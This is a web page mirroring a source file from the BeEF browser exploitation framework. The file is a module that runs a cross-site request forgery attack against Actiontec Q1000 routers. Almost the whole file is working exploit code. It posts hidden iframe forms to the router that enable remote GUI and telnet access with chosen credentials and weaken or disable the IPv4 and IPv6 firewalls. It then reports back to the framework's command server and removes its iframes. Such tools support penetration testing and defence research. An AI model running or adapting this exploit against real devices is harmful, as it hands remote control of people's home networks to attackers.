Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/router/actiontec_q1000_csrf/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
	var gateway = '<%= @base %>'; 

10
	var user    = '<%= @user %>';

11
	var passwd  = '<%= @password %>';

12
	var port    = '<%= @port %>';

13
	var timeout = 15;

14


15
	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", "application/x-www-form-urlencoded", [

16
		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},

17
		{'type':'hidden', 'name':'adminUserName',       'value':user},

18
		{'type':'hidden', 'name':'adminPassword',       'value':passwd},

19
		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},

20
		{'type':'hidden', 'name':'remGuiPort',          'value':port}

21
	]);

22


23
	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", "application/x-www-form-urlencoded", [

24
		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},

25
		{'type':'hidden', 'name':'remTelUser',          'value':user},

26
		{'type':'hidden', 'name':'remTelPass',          'value':passwd},

27
		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},

28
		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}

29
	]);

30


31
	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [

32
		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},

33
		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}

34
	]);

35


36
	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [

37
		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},

38
		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}

39
	]);

40


41
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

42


43
	cleanup = function() {

44
		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);

45
		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);

46
		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);

47
		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);

48
	}

49
	setTimeout("cleanup()", timeout*1000);

50


51
});

52


53


54